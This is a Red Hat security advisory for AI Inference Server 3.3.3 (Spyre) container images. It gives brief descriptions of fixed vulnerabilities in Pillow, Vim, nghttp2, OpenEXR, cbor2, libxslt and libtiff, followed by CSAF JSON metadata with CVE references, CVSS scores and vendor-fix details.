|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. By including a newline character in a pattern passed to Vim's glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user's shell settings.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library's failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AI Inference Server 3.3.3 (Spyre) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat\u00ae AI Inference Server",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:16174",
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-40403",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-52356",
"url": "https://access.redhat.com/security/cve/CVE-2023-52356"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13836",
"url": "https://access.redhat.com/security/cve/CVE-2025-13836"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-14831",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-15366",
"url": "https://access.redhat.com/security/cve/CVE-2025-15366"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-15367",
"url": "https://access.redhat.com/security/cve/CVE-2025-15367"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-0994",
"url": "https://access.redhat.com/security/cve/CVE-2026-0994"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1299",
"url": "https://access.redhat.com/security/cve/CVE-2026-1299"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22695",
"url": "https://access.redhat.com/security/cve/CVE-2026-22695"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22801",
"url": "https://access.redhat.com/security/cve/CVE-2026-22801"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23868",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-2447",
"url": "https://access.redhat.com/security/cve/CVE-2026-2447"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25506",
"url": "https://access.redhat.com/security/cve/CVE-2026-25506"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25646",
"url": "https://access.redhat.com/security/cve/CVE-2026-25646"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25749",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26209",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27135",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27622",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28417",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28421",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3497",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4111",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4424",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4519",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5121",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5201",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33412",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://www.redhat.com/en/products/ai/inference-server",
"url": "https://www.redhat.com/en/products/ai/inference-server"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_16174.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AI Inference Server 3.3.3 (Spyre)",
"tracking": {
"current_release_date": "2026-05-14T22:36:20+00:00",
"generator": {
"date": "2026-05-14T22:36:20+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:16174",
"initial_release_date": "2026-05-12T08:21:58+00:00",
"revision_history": [
{
"date": "2026-05-12T08:21:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-12T08:22:12+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:20+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AI Inference Server 3.3",
"product": {
"name": "Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ai_inference_server:3.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat AI Inference Server"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"product_id": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/vllm-spyre-rhel9@sha256%3Ac79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823?arch=ppc64le\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244546"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x",
"product_id": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x",
"product_identification_helper": {
"purl": "pkg:oci/vllm-spyre-rhel9@sha256%3Ae272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50?arch=s390x\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244546"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"product_id": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-spyre-rhel9@sha256%3Ab74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908?arch=amd64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244546"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40403",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2025-03-04T12:01:50.826520+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2349766"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libxslt: Processing web content may disclose sensitive information",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE is a duplicate of CVE-2022-4909.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "RHBZ#2349766",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2349766"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/10",
"url": "http://seclists.org/fulldisclosure/2023/Oct/10"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/3",
"url": "http://seclists.org/fulldisclosure/2023/Oct/3"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/4",
"url": "http://seclists.org/fulldisclosure/2023/Oct/4"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/5",
"url": "http://seclists.org/fulldisclosure/2023/Oct/5"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/6",
"url": "http://seclists.org/fulldisclosure/2023/Oct/6"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/8",
"url": "http://seclists.org/fulldisclosure/2023/Oct/8"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/9",
"url": "http://seclists.org/fulldisclosure/2023/Oct/9"
},
{
"category": "external",
"summary": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211",
"url": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211"
},
{
"category": "external",
"summary": "https://bugzilla.gnome.org/show_bug.cgi?id=751621",
"url": "https://bugzilla.gnome.org/show_bug.cgi?id=751621"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94",
"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94"
},
{
"category": "external",
"summary": "https://support.apple.com/en-us/HT213927",
"url": "https://support.apple.com/en-us/HT213927"
}
],
"release_date": "2023-09-26T20:14:54.697000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libxslt: Processing web content may disclose sensitive information"
},
{
"cve": "CVE-2023-52356",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2251344"
}
],
"notes": [
{
"category": "description",
"text": "A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtiff: Segment fault in libtiff in TIFFReadRGBATileExt() leading to denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw allows an attacker to potentially cause a denial of service attack by crashing a program, but the impact is minimal.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-52356"
},
{
"category": "external",
"summary": "RHBZ#2251344",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251344"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-52356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52356"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-52356",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52356"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/issues/622",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/622"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/merge_requests/546",
"url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/546"
}
],
"release_date": "2023-11-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
